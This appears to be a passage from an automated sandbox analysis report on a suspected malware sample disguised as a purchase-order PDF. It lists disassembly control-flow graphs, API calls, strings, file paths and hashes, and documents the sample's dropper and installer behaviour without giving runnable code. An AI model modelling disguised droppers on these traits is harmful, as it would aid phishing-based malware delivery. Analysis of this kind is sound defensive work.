                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 606308-1774368021
                                                                                                                                    • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 460 402eab-402eb2 451->460 461 402fcd-402fd5 call 402d8a 451->461 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 484 402f92-402f98 455->484 456->453 482 402fd7-402fe8 456->482 462 402eb4-402ec8 call 405be5 460->462 463 402f2e-402f32 460->463 461->453 471 402f3c-402f42 462->471 480 402eca-402ed1 462->480 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 473 402f51-402f5b 471->473 474 402f44-402f4e call 4064dc 471->474 473->448 481 402f61 473->481 474->473 480->471 486 402ed3-402eda 480->486 481->445 487 402ff0-402ff5 482->487 488 402fea 482->488 484->453 484->456 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 493 402eee-402f0e 491->493 496 40301e 492->496 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->471 499 402f2a-402f2c 497->499 498->481 498->497 499->471
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-3937443605
                                                                                                                                    • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 837 4017ad-4017ae call 4062e9 831->837 832->837 841 4017b3-4017b7 837->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 850 4017d5-4017e7 842->850 851 4017c5-4017d3 CompareFileTime 842->851 845 4017f5-401811 call 405c2a 843->845 846 4017ef-4017f0 call 405c05 843->846 853 401813-401816 845->853 854 401885-4018ae call 4051b4 call 403027 845->854 846->845 850->843 851->850 856 401867-401871 call 4051b4 853->856 857 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->857 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 856->866 857->841 889 40185c-40185d 857->889 870 402a55 866->870 868->869 872 4018c8-4018d3 CloseHandle 868->872 869->872 876 402a57-402a5b 870->876 874 4018d9-4018dc 872->874 875 402a4c-402a4f 872->875 878 4018f1-4018f4 call 406077 874->878 879 4018de-4018ef call 406077 lstrcatW 874->879 875->870 883 4018f9-40228d call 40579a 878->883 879->883 883->876 889->866 891 40185f-401860 889->891 891->856
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly$C:\Users\user\AppData\Local\Temp\nsd51BE.tmp$C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll$Call
                                                                                                                                    • API String ID: 1941528284-4008418245
                                                                                                                                    • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 909 40323b-40323f 904->909 907 40321d-403220 905->907 908 4031df-4031e2 905->908 910 403238 906->910 911 4030da-4030e2 906->911 912 403222 907->912 913 403225-40322e call 403242 907->913 908->910 914 4031e4 908->914 910->909 915 4030e4 911->915 916 4030e7-4030f5 call 403242 911->916 912->913 913->902 925 403235 913->925 918 4031e7-4031ed 914->918 915->916 916->902 924 4030fb-403104 916->924 921 4031f1-4031ff call 403242 918->921 922 4031ef 918->922 921->902 930 403201-40320d call 405cdc 921->930 922->921 927 40310a-40312a call 40654a 924->927 925->910 934 403130-403143 GetTickCount 927->934 935 4031d3-4031d5 927->935 936 4031d7-4031d9 930->936 937 40320f-403219 930->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->918 940 40321b 937->940 941 403155-40318b MulDiv wsprintfW call 4051b4 938->941 942 40314f-403153 938->942 943 403192-403196 939->943 944 4031c7-4031cb 939->944 940->910 941->939 942->939 942->941 947 403198-40319f call 405cdc 943->947 948 4031ad-4031b8 943->948 944->911 945 4031d1 944->945 945->910 953 4031a4-4031a6 947->953 949 4031bb-4031bf 948->949 949->927 952 4031c5 949->952 952->910 953->936 954 4031a8-4031ab 953->954 954->949
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 987 4026f9-4026fc 984->987 988 402693-40269e 985->988 987->981 989 4026fe-402703 987->989 988->987 990 4026a0-4026c5 SetFilePointer MultiByteToWideChar 988->990 992 402740-402744 989->992 993 402705-40270a 989->993 990->988 991 4026c7 990->991 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 997 402752-40275f 995->997 998 40274c-402750 995->998 996->963 999 402721-402727 996->999 997->963 998->994 998->997 999->969 1000 40272d 999->1000 1000->963
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1011 4023d1-4023de call 402bbf lstrlenW 1008->1011 1012 4023e2-4023e5 1008->1012 1011->1012 1013 4023f5-4023f8 1012->1013 1014 4023e7-4023f4 call 402ba2 1012->1014 1019 402409-40241d RegSetValueExW 1013->1019 1020 4023fa-402404 call 403027 1013->1020 1014->1013 1023 402422-4024fc RegCloseKey 1019->1023 1024 40241f 1019->1024 1020->1019 1023->1009 1026 40281e-402825 1023->1026 1024->1023 1026->1009
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsd51BE.tmp
                                                                                                                                    • API String ID: 1356686001-494344942
                                                                                                                                    • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3449924974-823278215
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1047 1000180c-10001810 1045->1047 1048 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1048 1049 100017d7-100017da 1046->1049 1050 100017be-100017bf 1046->1050 1051 10001812-1000184c call 100015b4 call 100024a9 1047->1051 1052 1000184e-10001854 call 100024a9 1047->1052 1074 10001855-10001859 1048->1074 1049->1045 1053 100017dc-100017dd call 10002b5f 1049->1053 1055 100017c1-100017c2 1050->1055 1056 100017c7-100017c8 call 100028a4 1050->1056 1051->1074 1052->1074 1068 100017e2 1053->1068 1057 100017c4-100017c5 1055->1057 1058 100017cf-100017d5 call 10002645 1055->1058 1065 100017cd 1056->1065 1057->1045 1057->1056 1073 100017e4 1058->1073 1065->1068 1068->1073 1073->1045 1077 10001896-1000189d 1074->1077 1078 1000185b-10001869 call 1000246c 1074->1078 1077->1037 1080 1000189f-100018a0 GlobalFree 1077->1080 1083 10001881-10001888 1078->1083 1084 1000186b-1000186e 1078->1084 1080->1037 1083->1077 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1077 1087->1083
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1791698881-3916222277
